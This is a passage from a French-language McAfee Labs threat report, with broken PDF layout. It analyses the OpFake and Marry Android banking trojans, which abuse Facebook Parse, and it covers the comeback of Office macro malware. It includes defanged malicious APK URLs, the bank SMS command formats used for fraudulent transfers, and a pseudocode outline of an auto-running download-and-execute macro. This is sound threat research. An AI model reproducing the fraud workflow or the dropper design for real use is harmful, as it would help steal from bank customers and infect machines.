dans la table NewTasks de l'outil Facebook Parse. Une fois la commande exécutée, la tâche est enregistrée dans la table TaskManager pour mettre à jour l'enregistrement ultérieurement avec la réponse à la tâche : Alarme système Exécution du récepteur de contenu Interrogation de la table NewTasks de Parse par ID d'équipement Tâche push • • • • • type: issu de NewTasks task: type et arguments hash: identifiant IMEI: ID d'équipement response: vide IMEI == ID d'équipement Non Fin Oui Non Exécution de la nouvelle tâche Si type== tâche et IMEI== ID d'équipement Enregistrement de la tâche exécutée dans la table TaskManager Oui Fin Marqueur Intercept activé/désactivé Oui Task== Intercept Non Android/OpFake obtient de nouvelles commandes de la table NewTasks de Facebook Parse. Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 20 Points marquants En plus de la tâche « Intercept » (à activer/désactiver), Android/OpFake peut exécuter n'importe laquelle des commandes présentes dans la table NewTasks ou envoyées dans une notification push : Commandes Android/OpFake Commande Action SMS Envoie un SMS au numéro, avec le contenu présent dans l'enregistrement NewTasks. USSD Envoie un message USSD à l'aide de l'URI « tel: ». URL Ouvre l'URL fournie par l'enregistrement NewTasks dans le navigateur web par défaut. New_server Enregistre localement l'URL du nouveau serveur de contrôle. Install Télécharge un fichier APK à partir de l'URL fournie par l'enregistrement NewTasks sur la carte SD. Si l'appareil est déjà débridé, le logiciel malveillant utilise les privilèges administrateur pour installer silencieusement le fichier APK comme une application système à l'aide de la commande « pm install ». Si l'appareil n'est pas débridé, le malware incite l'utilisateur à installer l'application en affichant un message dans l'interface utilisateur. Une fois la tâche terminée, l'enregistrement est supprimé de la table NewTasks pour éviter une nouvelle exécution de la commande. En cas de réception d'un SMS, Android/OpFake exécute les actions suivantes : ■■ ■■ ■■ Il enregistre le message dans la table SmsReceiver de Facebook Parse. Il envoie les données du message au canal de diffusion push « T » de Facebook Parse. Si le marqueur Intercept est activé, le logiciel malveillant transmet le message (ainsi que le solde si le SMS est envoyé par une société comme MegaFon) au serveur de contrôle habituel. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 21 Points marquants • • • • from content to: imei type: service/ other • is_card: si le contenu contient cc # • intype: incoming Interrogation de la table TaskManager par hachage de tâche Enregistrement du message dans la table SmsReceiver Enregistrement de la réponse (provenant du corps) dans TaskManager Oui Réception d'un message SMS Traitement d'un message SMS Marqueur Intercept activé ? Oui Réponse à un SMS précédent envoyée ? imei phone: provenance message type: entrant Envoi des données du message au canal de diffusion push « I » de Parse Fin Non Non • • • • Non Origine contient 088011 ou 000100 ? Envoi du message à /bn/ save_message.php Oui Extraction et enregistrement du solde à partir du corps du message Interaction entre Android/OpFake et Facebook Parse lors de la réception d'un SMS Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Android/OpFake vérifie également si le SMS est une réponse à un SMS précédemment envoyé via la table NewTasks. Si c'est le cas, le contenu est enregistré dans le champ « response ». Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 22 Points marquants Cheval de Troie bancaire sur mobiles : tables de l'outil Facebook Parse Notre analyse statique du logiciel malveillant Android/OpFake nous a permis de découvrir la finalité des données enregistrées dans chaque table de l'outil Facebook Parse : Tables de contrôle d'Android/OpFake dans Facebook Parse Tables Parse Objectif NewTasks Enregistre les nouvelles commandes en attente d'exécution sur chaque appareil infecté. Une fois la commande exécutée, l'enregistrement est supprimé. Exemples de tâches et d'arguments : ■■ ■■ Intercept : activé/désactivé et date. ■■ New_server : URL et date. ■■ SmsReceiver From : origine du SMS (numéro de téléphone/ nom de la société). ■■ Intype : entrant/sortant. ■■ To : ID d'équipement de l'appareil infecté. ■■ ■■ Partager ce rapport Install : ID d'équipement, URL pointant vers un fichier APK, nom du package de la nouvelle application et date. Contient tous les SMS entrants interceptés qui ont été envoyés à l'appareil infecté : ■■ TaskManager SMS : origine (ID d'équipement de l'appareil infecté), destination, contenu, date. Is_card : vrai/faux si l'appareil contient un numéro de carte de crédit. Type : « service » si le message a été envoyé par une société (p. ex. MegaFon) ou « other » s'il s'agit d'un autre numéro de téléphone (message personnel). Stocke toutes les tâches exécutées ainsi que la réponse si le SMS entrant est une réponse à une tâche précédemment exécutée (p. ex. une demande de solde d'une carte de crédit spécifique). Au total, nous avons identifié cinq comptes exposés par Facebook Parse. Quatre d'entre eux étaient utilisés par Android/OpFake et le dernier, le compte D, par Android/Marry au cours de la période d'analyse. Dans le cas de la table NewTasks, notre analyse statique a révélé qu'une fois la tâche exécutée, l'enregistrement d'exécution de la commande est supprimé de la table. Après analyse de la date de création de chaque enregistrement de la table, nous avons découvert qu'il n'existe pratiquement aucun enregistrement d'exécution de commande avant le 25 juin. Cela signifie probablement que toutes les commandes créées à ce moment-là ont été exécutées par les appareils infectés (ou qu'aucune nouvelle commande n'a été créée). Après le 25 juin, nous avons trouvé plusieurs enregistrements dans tous les comptes. Nous pouvons en déduire qu'aucune commande n'a été exécutée puisque les enregistrements n'ont pas été supprimés. Le logiciel malveillant a sans doute été supprimé de l'appareil de la victime. Notre analyse de la date de création des enregistrements dans la table NewTasks de Facebook Parse révèle que les conséquences auraient pu être plus graves pour les victimes si toutes les commandes en attente depuis le 25 juin avaient été exécutées par les appareils infectés. Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 23 Points marquants Dates de création des enregistrements d'exécution de commande NewTasks 14 000 12 000 10 000 8 000 6 000 4 000 2 000 0 13 15 17 19 21 23 Juin 2015 25 27 29 1 Compte A (OpFake) Compte B (OpFake) Compte D (Marry) Compte E (OpFake) 3 5 7 9 11 Juillet 2015 13 Compte C (OpFake) Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf La commande la plus exécutée dans la table NewTasks est SMS, avec respectivement 50 000 et 60 000 enregistrements dans les comptes B et E (Android/OpFake). Le compte D (Android/Marry) ne contenait qu'un petit nombre d'enregistrements, sans doute parce que la plupart des appareils infectés étaient en train d'exécuter les tâches au moment de l'analyse : Types de commandes dans la table NewTasks 70 000 60 000 50 000 40 000 30 000 20 000 10 000 0 Compte A (OpFake) Compte B (OpFake) Toutes les commandes SMS Compte C (OpFake) Intercept Compte D (Marry) New_server Compte E (OpFake) Install Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 24 Points marquants Les données révèlent que des milliers de commandes étaient toujours en attente d'exécution par Android/OpFake tandis qu'Android/Marry avait pu traiter la plupart des tâches. Les chiffres montrent également que le premier objectif de ces deux familles de malware est d'envoyer des SMS à des fins de fraude financière, comme le prouvent les données obtenues dans la table TaskManager. En ce qui concerne l'exécution de commandes autres que SMS et install, nous en avons trouvé plusieurs exemples dans la table NewTasks : ■■ New_server : ––hxxp://newwelcome00.ru ––hxxp://newelcome00.ru ■■ Install : ––Android/OpFake distribuant Android/Marry : ■■ hxxp://newwelcome00.ru/appru.apk (marry.adobe.net.threadsync). ■■ hxxp://newwelcome00.ru/app.apk (marry.adobe.net.nightbuid). ––hxxp://notingen.ru/Player.apk (com.adobe.net) ––hxxp://швждаыдлпждв Pour la table SmsReceiver, le compte E (Android/OpFake) est le plus actif puisqu'il a intercepté et volé plus de 60 000 SMS entrants, suivi du compte B avec environ 41 000 enregistrements : Nombre de messages dans la table SmsReceiver 70 000 60 000 50 000 40 000 30 000 20 000 10 000 0 Compte E (OpFake) Compte B (OpFake) Compte A (OpFake) Compte C (OpFake) Compte D (Marry) Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Les données indiquent qu'Android/OpFake a collecté près de 170 000 SMS sur les appareils infectés. La plupart d'entre eux étaient des messages personnels puisque, comme nous l'avons vu plus haut, les tâches récentes de la table NewTasks n'avaient pas été exécutées. Cela prouve que les victimes n'ont pas seulement subi un préjudice financier, mais que leur vie privée a été également compromise par les cybercriminels. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 25 Points marquants En analysant le champ is_card dans la table SmsReceiver, nous avons pu découvrir le nombre de numéros de carte de crédit volés dans les SMS entrants au cours des deux mois d'analyse : Nombre de numéros de carte de crédit volés (pendant la période d'étude de deux mois) 140 120 100 80 60 40 20 0 Compte D (Marry) Compte E (OpFake) Compte B (OpFake) Compte A (OpFake) Compte C (OpFake) Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Pour les dates auxquelles les SMS ont été interceptés, tous les comptes ont été particulièrement actifs entre le 16 et le 24 juin : Dates de création des enregistrements d'exécution de commande SmsReceiver 16 000 14 000 12 000 10 000 8 000 6 000 4 000 2 000 0 8 10 12 14 16 18 20 22 24 26 28 30 Juin 2015 Compte A (OpFake) Compte B (OpFake) Compte D (Marry) Compte E (OpFake) 2 4 6 8 10 12 14 16 Juillet 2015 Compte C (OpFake) Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 26 Points marquants En ce qui concerne la table TaskManager, qui contient les tâches exécutées avec, le cas échéant, la réponse associée, c'est le compte D (Android/Marry) qui a exécuté le plus grand nombre de tâches : Types de commandes dans la table TaskManager 21 000 18 000 15 000 12 000 9 000 6 000 3 000 0 Compte A (OpFake) Demandes Compte B (OpFake) Réponses Compte C (OpFake) SMS Compte D (Marry) Intercept Compte E (OpFake) Install Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf En considérant les données fournies par la table NewTasks, le graphique précédent confirme qu'Android/Marry était très actif au moment où nous avons accédé aux comptes exposés et que plus de 20 000 commandes ont été exécutées, pour la plupart des tâches SMS destinées à la fraude financière. Comme Android/Marry est la famille qui est parvenue à exécuter le plus grand nombre de tâches (compte tenu du nombre d'enregistrements dans la table TaskManager), notre analyse s'est concentrée sur les commandes exécutées ainsi que leurs réponses dans le compte D. L'analyse de la destination des tâches SMS nous a permis d'identifier les sociétés les plus fréquemment ciblées par Android/Marry (compte D) : Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 27 Points marquants Nombre de requêtes SMS par société ciblée (pendant la période d'étude de deux mois) 5 500 5 000 4 500 4 000 3 500 3 000 2 500 2 000 1 500 1 000 500 Banque 5335 Banque 100 Banque 79037672265 Banque 159 Banque 3116 Banque 7878 Banque 6996 Banque 7494 Banque 10060 Banque 900 0 Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf 5 350 SMS ont été envoyés au numéro 900 d'une grande banque d'Europe de l'Est. Les transactions financières suivantes ont été effectuées par les SMS : Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 28 Points marquants Commandes identifiées dans la table TaskManager Commande Format Réponse BALANCE/ BALANS/баланс (Solde) BALANS <4_derniers_ chiffres> Solde VISA1234 : <montant> INFO/СПРАВКА (Informations) СПРАВКА Liste de cartes connectées : VISA1234(ON); ПЕРЕВОД/ PEREVOD/ ПЕРЕВЕСТИ (Transfert) ПЕРЕВОД <origine_ carte_4chiffres> <destination_ carte_4chiffres> ou <destination_numéro_ téléphone> <montant> Pour transférer <montant> de la carte VISA1234, le destinataire <nom> doit envoyer le code <code> au numéro 900. ZAPROS (Demande) ZAPROS <numéro_ téléphone> <montant> Une demande de transfert de <montant> à votre carte VISA5678 a été envoyée. Après confirmation par l'expéditeur <nom>, l'argent sera versé sur votre compte. TEL/PLATEZ/ PHONE/ POPOLNI/PLATI (Paiement d'un compte mobile) TEL <numéro_téléphone> <montant> Pour payer avec la carte VISA1234 au numéro <société> <numéro_ téléphone> le montant <montant>, envoyez le code <code> au numéro 900. Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Normalement, une transaction financière frauduleuse commence par l'envoi d'une commande INFO au numéro 900 (à l'aide de la table NewTasks) afin d'obtenir une liste de cartes connectées. Si une réponse est renvoyée et que la victime possède une ou plusieurs cartes de crédit activées pour l'envoi de transactions par SMS (par exemple VISA1234(ON)), le cybercriminel vérifie le solde de chaque carte de crédit. Si des fonds sont disponibles, une transaction frauduleuse est initiée pour transférer un montant à une autre carte ou client ou pour payer un compte de téléphone mobile en créant un enregistrement dans la table NewTasks avec la destination 900 et les mots Transfert (en russe) ou TEL/PLATI. En guise de mesure de sécurité, la banque répond en envoyant un code que l'utilisateur doit envoyer pour confirmer la transaction. Le cybercriminel consulte la table TaskManager pour obtenir le code et crée un nouvel enregistrement d'exécution de commande dans la table NewTasks pour envoyer le code de confirmation au numéro 900. Dans le cas d'une demande (ZAPROS), le cybercriminel demande un montant de transfert à un numéro de téléphone qui pourrait être un autre appareil infecté. Si la transaction est confirmée par l'autre victime, l'argent est transféré au cybercriminel. Comme la demande de solde (BALANCE) est effectuée pour chaque carte de crédit, elle a été la demande la plus courante au cours des deux mois d'étude. Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 29 Points marquants Nombre de requêtes par commande de transaction bancaire (pendant la période d'étude de deux mois) 5 000 4 000 3 000 2 000 1 000 0 BALANCE/ BALANS/ /баланс (Solde) INFO/ СПРАВКА (Informations) ПЕРЕВОД/ PEREVOD/ ПЕРЕВЕСТИ (Transfert) ZAPROS (Demande) TEL/PLATEZ/ PHONE/ POPOLNI/PLATI (Paiement d'un compte mobile) Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Voici les types de réponse de la banque ciblée recensés dans le compte D : Réponses envoyées par la banque ciblée et enregistrées dans la table TaskManager Type Réponse Solde Solde VISA1234 : <montant> Info Liste de cartes connectées : VISA1234(ON); Demande du numéro de téléphone Pour payer avec la carte VISA1234 au numéro <société> <numéro_téléphone> le montant <montant>, envoyez le code <code> au numéro 900. Traitement du numéro de téléphone Paiement VISA1234 <date> <heure> pour les services <montant> <opérateur> <numéro_téléphone>. Solde : <montant> Traitement du transfert MAES1234 : Le transfert <montant> au destinataire de la carte <nom> est traité. Acceptation du transfert VISA1234 : <date/heure> Montant <montant> de l'expéditeur <nom> reçu. Solde : <montant> Demande de transfert Pour transférer <montant> de la carte VISA1234, le destinataire de la carte <nom> doit envoyer le code <code> au numéro 900. Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 30 Points marquants Nous pouvons regrouper le type de réponses par catégorie : ■■ ■■ ■■ Solde/Informations : Contient des informations générales, par exemple des cartes de crédit liées au compte bancaire et activées ainsi que le solde actuel. Demande de transfert : Les réponses incluent les codes de confirmation qui doivent être envoyés par l'utilisateur pour finaliser les transactions. Traitement du transfert : Contient les transactions frauduleuses confirmées. Nombre de réponses de la banque ciblée ayant été détectées dans la table TaskManager (pendant la période d'étude de deux mois) 700 600 500 400 300 200 100 0 Solde Informations Demande Traitement Traitement du numéro du numéro du transfert de téléphone de téléphone Acceptation du transfert Demande de transfert Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Ici aussi, le solde est la réponse la plus répandue puisque les cybercriminels ont obtenu 607 soldes de carte de crédit. En deuxième lieu, on trouve les informations, répertoriant les cartes de crédit liées à 123 comptes bancaires. Au total, 141 transactions frauduleuses (paiement par téléphone et transfert) ont été exécutées au cours des mois de juin et juillet. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 31 Points marquants Nombre d'utilisateurs affectés par les chevaux de Troie bancaires sur mobiles Comme chaque enregistrement est associé à un identifiant d'équipement unique (IMEI ou android_id), nous avons pu recenser le nombre de victimes concernées par table et par compte. Il apparaît que le nombre d'utilisateurs susceptibles d'être affectés si les appareils infectés avaient utilisé la table NewTasks est beaucoup plus élevé que le nombre d'utilisateurs réellement touchés, si l'on s'en réfère au nombre d'identifiants d'équipement uniques répertoriés dans la table TaskManager (tâches exécutées). D'autre part, nous avons constaté qu'Android/OpFake (comptes A, B, C et E) affiche un taux de réussite plus élevé dans l'interception des SMS tandis que Android/Marry a affecté un nombre plus élevé d'utilisateurs en réalisant des transactions frauduleuses via SMS. Des milliers d'utilisateurs, résidant pour la plupart en Europe de l'Est, ont été affectés par ces deux chevaux de Troie bancaires sur mobiles au cours des deux mois de données analysées. Nombre d'utilisateurs affectés par table (pendant la période d'étude de deux mois) 9 000 8 000 7 000 6 000 5 000 4 000 3 000 2 000 1 000 0 Compte A (OpFake) Compte B (OpFake) NewTasks SmsReceiver Compte C (OpFake) Compte D (Marry) Compte E (OpFake) TaskManager Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Divulgation responsable Le 3 août, Siegfried Rasthofer et Eric Bodden ont transmis leurs résultats à Facebook. Le 6 août, Facebook bloquait tous les comptes Facebook Parse exposés et utilisés par ces chevaux de Troie. Cette étude prouve que les chevaux de Troie bancaires sur mobiles constituent une menace bien réelle qui touche des milliers d'utilisateurs et de nombreuses sociétés. C'est particulièrement vrai en Europe de l'Est, une région où la fraude financière par SMS est très active grâce aux applications mobiles malveillantes. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 32 Points marquants Notre analyse révèle aussi que les transactions frauduleuses ont affecté des centaines d'utilisateurs au cours des deux mois de notre étude. Enfin, l'analyse prouve que les auteurs de malware ne sont pas très différents des développeurs d'applications légitimes dans le sens où ils se concentrent davantage sur les fonctionnalités de l'application, plutôt que sur la sécurité des données collectées ou utilisées par le logiciel malveillant. Nous n'aurions pas pu réaliser cette analyse si les attaquants avaient codé leurs logiciels malveillants en respectant les bonnes pratiques de sécurité. Protection Dans le cas d'applications mobiles légitimes, il n'est guère facile pour l'utilisateur de savoir si l'application utilise un service BaaS et, si c'est le cas, de déterminer si la sécurité de ce service a été correctement implémentée. Pour limiter l'exposition des données personnelles dans les services BaaS, McAfee Labs recommande aux utilisateurs de se limiter aux applications mobiles bien connues et dont la sécurité a été confirmée par un organisme indépendant digne de confiance. En ce qui concerne les chevaux de Troie bancaires sur mobiles, comme l'a révélé notre analyse des comptes Facebook Parse exposés, les appareils infectés sont utilisés pour distribuer du malware au moyen d'attaques de phishing qui envoient des SMS avec le texte « Vous avez 1 message non lu ». Intel Security recommande de télécharger des applications mobiles uniquement sur des boutiques d'applications connues, par exemple Google Play, et d'éviter les applications de sources inconnues. Ce conseil est également valable pour les SMS et les e-mails. Nous recommandons également d'éviter de débrider les terminaux mobiles (ou de ne faire qu'après exécution de la tâche exigeant des privilèges administrateur). En effet, les logiciels malveillants sur mobiles exploitent souvent l'accès avec privilèges pour installer silencieusement des applications sans le consentement de l'utilisateur. Enfin, pour protéger les appareils contre de telles menaces, nous recommandons l'installation d'une solution de sécurité mobile. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 33 Points marquants Le retour des logiciels malveillants diffusés par macro — Diwakar Dinkar et Rakesh Sharma Vous souvenez-vous des macros malveillantes ? Dans les années 90, des menaces telles que Melissa et WM.Concept ont fait des ravages jusqu'à ce que Microsoft prenne des mesures pour réduire leur efficacité. Après une éclipse de plusieurs années, les macros malveillantes sont à nouveau en plein essor. La plupart des particuliers sont à l'abri de telles menaces dans la mesure où ils utilisent peu les macros. En revanche, les grandes entreprises y ont souvent recours pour créer facilement des programmes destinés à traiter des tâches répétitives. Actuellement, les développeurs de logiciels malveillants diffusés par macro utilisent des techniques d'ingénierie sociale courantes pour s'attaquer aux entreprises, avec le concours involontaire de leurs utilisateurs. Fonctionnement des macros Une macro est un raccourci permettant d'automatiser une tâche fréquemment exécutée. Il s'agit d'un segment de code incorporé dans un document, généralement écrit dans le langage de programmation VBA (Visual Basic for Applications) dans le cas des fichiers Microsoft Office. Lorsque vous enregistrez une macro, vous créez en réalité un programme dans un langage de programmation extrêmement puissant. Une macro peut s'exécuter automatiquement lorsque l'utilisateur effectue une opération spécifique, telle que lancer Microsoft Word ou ouvrir un document. Word reconnaît les noms suivants comme des macros automatiques : ■■ AutoExec : Démarre au chargement de Word ou du modèle global. ■■ AutoNew : Démarre lorsque l'utilisateur crée un nouveau document. ■■ AutoOpen : Démarre lorsque l'utilisateur ouvre un document. ■■ AutoClose : Démarre lorsque l'utilisateur ferme un document. ■■ AutoExit : Démarre à la fermeture de Word ou du modèle global. Les macros légitimes permettent de gagner du temps lors de l'exécution de tâches simples ou complexes. Toutefois, les auteurs de malware peuvent truffer les macros de code malveillant susceptible de causer des dommages. Les macros malveillantes peuvent exister dans tout produit permettant aux utilisateurs d'écrire des scripts de macro. Du fait de sa popularité, Microsoft Word est le produit le plus ciblé par les logiciels malveillants diffusés par macro. Le malware se propage facilement dans les documents Word parce qu'ils peuvent à la fois contenir du texte et des macros. Cette combinaison de texte et de macros offre davantage de contrôle et de souplesse à l'utilisateur, mais ouvre par là même la porte aux logiciels malveillants diffusés par macro. Les fichiers Excel partagent les mêmes avantages et inconvénients que les fichiers Word dans la mesure où les données et les macros associées sont contenues dans un même classeur. Après avoir pris conscience de l'ampleur de la menace, Microsoft a modifié la configuration par défaut d'Office pour interdire l'exécution des macros et ainsi protéger la plupart des utilisateurs. Cependant, de nombreuses grandes entreprises recourent aux macros, ce qui comporte des risques non négligeables. Les auteurs de logiciels malveillants en ont tiré profit, ce qui a entraîné le retour des logiciels malveillants diffusés par macro, sous le couvert de simples ruses d'ingénierie sociale. Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 34 Points marquants Bref historique des macros malveillantes Dans les années 90, les logiciels malveillants diffusés par macro, tels que les virus WM.Concept et Melissa, ont infecté des millions d'utilisateurs de Microsoft Office. ■■ ■■ WM.Concept : Le premier virus de macro propagé via Word est apparu en 1995. Pour la première fois, les virus pouvaient résider sur des documents de traitement de texte et de tableur courants. Melissa : Ce virus de macro de mass-mailing a été découvert par McAfee Labs en 1999. Melissa se propage par le biais d'un document Word ; celui-ci est joint à un e-mail qui invite le destinataire à ouvrir et à lire la pièce jointe. Le virus s'exécute une fois le document ouvert. Melissa vérifie si Word 97 ou 2000 est installé. Il désactive certaines fonctionnalités du logiciel, notamment le message d'avertissement concernant les macros à l'ouverture suivante du document dans Word 2000. Il infecte les autres documents Word 97 et 2000 en ajoutant une nouvelle macro nommée Melissa. Il se propage en envoyant des copies du document infecté à jusqu'à 50 adresses e-mail en utilisant des versions compatibles d'Outlook. Si la machine infectée n'est pas équipée d'Outlook ou ne possède pas de connexion Internet, le virus continue de se propager localement. On estime que ce virus a infecté jusqu'à 20 % des ordinateurs de la planète et a battu tous les records de vitesse de propagation à l'époque. Pour contrer les logiciels malveillants diffusés par macro, Microsoft a conçu une étape d'activation des macros, avec une procédure d'autorisation qui sert de vérification. Office désactive désormais toutes les macros par défaut de sorte qu'elles ne puissent pas s'exécuter sans l'autorisation de l'utilisateur. Cette intervention a tempéré les ardeurs des auteurs de logiciels malveillants diffusés par macro, et l'influence des macros malveillantes a fini par décliner. La résurgence Malgré les améliorations apportées par Microsoft, nous avons constaté cette année que des logiciels malveillants dissimulés dans des macros étaient utilisés sous la forme de menaces persistantes pour cibler les entreprises. Une augmentation massive du nombre de logiciels malveillants diffusés par macro au cours des derniers trimestres indique que les programmes Office constituent à nouveau des cibles privilégiées. Nouveaux logiciels malveillants diffusés par macro Les menaces de macro Office sont à leur niveau le plus élevé depuis six ans. 45 000 40 000 35 000 30 000 25 000 20 000 15 000 10 000 5 000 0 4e trim. 2013 Partager ce rapport 1er trim. 2e trim. 3e trim. 2014 4e trim. 1er trim. 2e trim. 2015 3e trim. Un pic énorme dans les envois d'échantillons à McAfee Labs indique que les logiciels malveillants diffusés par macro sont à nouveau en plein essor. Source : McAfee Labs, 2015 Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 35 Points marquants Attaques de logiciels malveillants diffusés par macro, par région 1%1% Amérique du Nord 12 % Europe Asie 13 % 44 % Amérique centrale Océanie 29 % Afrique Amérique du Sud Les attaques par logiciels malveillants diffusés par macro sont plus nombreuses en Amérique du Nord, suivie par l'Europe du Nord. Source : McAfee Labs, 2015 Chaîne d'infection Les logiciels malveillants diffusés par macro se propagent essentiellement par le biais de pièces jointes aux messages de spam. Ils exploitent pour ce faire des campagnes de spam, des pages web compromises et des téléchargements involontaires. Le mécanisme de distribution a évolué. Les premières campagnes de spam s'étalaient sur plusieurs jours, voire plusieurs semaines, et utilisaient le même objet d'e-mail ou le même nom de pièce jointe. Cette uniformité permettait aux éditeurs de solutions de sécurité de détecter et de neutraliser rapidement les menaces. Aujourd'hui en revanche, les campagnes de spam exploitant les macros ont une durée réduite, les objets sont fréquemment modifiés et les pièces jointes sont élaborées avec soin pour échapper à la détection. Qui plus est, les infections passent souvent inaperçues parce que le fichier se comporte comme un document normal, même après s'être acquitté de sa tâche malveillante. Les macros malveillantes servent généralement de point d'entrée pour permettre à d'autres malwares de s'introduire dans le système d'une victime et causer davantage de dommages. Le diagramme suivant représente la chaîne d'infection habituelle des logiciels malveillants diffusés par macro — du contact initial à la distribution de la charge active malveillante. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 36 Points marquants Chaîne d'infection des logiciels malveillants diffusés par macro Un message de spam contient un document Office avec une macro. L'utilisateur active et exécute la macro. Le malware télécharge d'autres logiciels malveillants sur le serveur de contrôle. La chaîne d'infection commence au niveau du message de spam transportant un fichier .doc ou .zip malveillant en pièce jointe. Le contenu de l'e-mail est conçu pour duper les utilisateurs à l'aide de techniques d'ingénierie sociale. Voici quelques exemples illustrant le type de lignes d'objet utilisées à ces fins : ■■ Demande de paiement ■■ Avis important et virement international refusé ■■ Fax-54078429-248035834 ■■ Notification de courrier ■■ Curriculum vitae ■■ Demande de paiement de 4478,63 ■■ Facture Help Desk US ■■ Facture de vente ■■ Confirmations de donations ■■ Facture alias Hello Une ligne d'objet efficace peut pousser un utilisateur trop confiant à lire l'e-mail et à ouvrir la pièce jointe. Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 37 Points marquants Exemples d'e-mails contenant des pièces jointes malveillantes Lorsqu'un utilisateur ouvre un fichier Word malveillant, Word affiche une notification de sécurité demandant à l'utilisateur s'il souhaite activer les macros. Une fois les macros activées, la macro contenant le logiciel malveillant s'exécute. Le contenu des fichiers Word malveillants varie en fonction des différentes familles de menaces. L'utilisateur peut voir un document vierge ou être invité à activer les macros pour afficher le contenu du document. Certains logiciels malveillants effacent le contenu du document après l'activation de la macro. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 38 Points marquants Exemples de fichiers Word malveillants Un utilisateur qui active les macros pour ouvrir un document malveillant permet l'exécution du logiciel malveillant. Une fois les macros exécutées, le logiciel malveillant dépose un ou plusieurs fichiers .bat, .vbs ou .ps (PowerShell) sur le système de la victime, selon qu'il s'agit d'un logiciel malveillant de la famille de Bartallex, Dridex, Donoff, ou d'un autre programme de téléchargement. Ces fichiers déposés téléchargent ensuite d'autres logiciels malveillants, tels qu'Upatre, Vawtrak, Chanitor ou Zbot. McAfee Labs a récemment identifié des macros qui téléchargent des menaces ou des logiciels de demande de rançon (ransomware) ciblant les points de vente. Dissimulation des logiciels malveillants diffusés par macro Au cours de notre analyse, nous avons découvert beaucoup de code parasite dans les scripts de macro, ainsi que des API parasites dans les exécutables. L'ajout de code parasite est généralement utilisé comme technique d'obstruction à l'ingénierie inverse et pour éviter la détection. Des lignes de code sont insérées de façon récurrente pour compliquer les investigations et masquer l'intention malveillante. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 39 Points marquants Les développeurs de logiciels malveillants diffusés par macro ajoutent du code parasite pour tenter de compliquer l'ingénierie inverse. Ce type de dissimulation de code est extrêmement efficace. Nous avons également rencontré de nombreux cas, non seulement de chaînes malveillantes, mais également de données parasites corrompues. Les attaquants tentent généralement de dissimuler les codes de macro en abusant de fonctions pouvant aller de la simple conversion de caractères, telles que Chr() et ChrW(), à un chiffrement personnalisé complexe. Cet exemple illustre l'utilisation d'une fonction de conversion de caractère pour reconstruire l'URL malveillante afin de télécharger la charge active finale. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 40 Points marquants Exécution des macros Un document malveillant commence parfois par la macro Auto_Open(), qui s'exécute automatiquement chaque fois que le document est ouvert. Auto_Open() appelle ensuite la méthode principale. Les macros peuvent également contenir des gestionnaires d'événements Office tels qu'AutoOpen() et Workbook_Open(). Ces gestionnaires d'événements appellent Auto_Open(), qui appelle ensuite la méthode principale qui distribue la charge active sur la machine de la victime. En appliquant les trois macros (Auto_Open(), AutoOpen(), et Workbook_Open()) à un document, les attaquants réduisent le risque d'échec de l'exécution malveillante. Func AutoOpen() Auto_Open End Func Func Workbook_Open Auto_Open End Func Func Auto_Open() Main_Func End Func Func Main_Func() Déchiffrement de l'URL Déchiffrement du chemin du fichier End Func Func Download (URL, PATH) Téléchargement de la charge active finale End Func Les attaquants utilisent souvent des macros redondantes pour garantir le succès des attaques. Lors de l'exécution du logiciel malveillant, un objet XMLHTTP est créé afin d'échanger des données avec le serveur. Celui-ci envoie des demandes de connexion au serveur en continu à l'aide de la fonction HTTP Send() jusqu'à ce qu'il obtienne une réponse. Une fois la connexion établie avec l'URL déchiffrée, la charge active finale est téléchargée et enregistrée dans l'emplacement spécifié sur la machine de la victime. Enfin, le fichier binaire téléchargé est exécuté à l'aide de la commande Shell(). Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 41 Points marquants Objet XMLHTTP instancié Préparation du corps de la demande HTTP Send() Non readyState==4 ? Oui Variable= Réponse (Fichier chargé) Enregistrement du contenu dans l'emplacement spécifié Exécution du fichier charge à l'aide de Shell() Ce diagramme illustre la routine de distribution de la charge active du logiciel malveillant. Comportement de Bartallex Examinons Bartallex, qui contient trois macros malveillantes incorporées. Détails de l'extraction de macro dans Bartallex 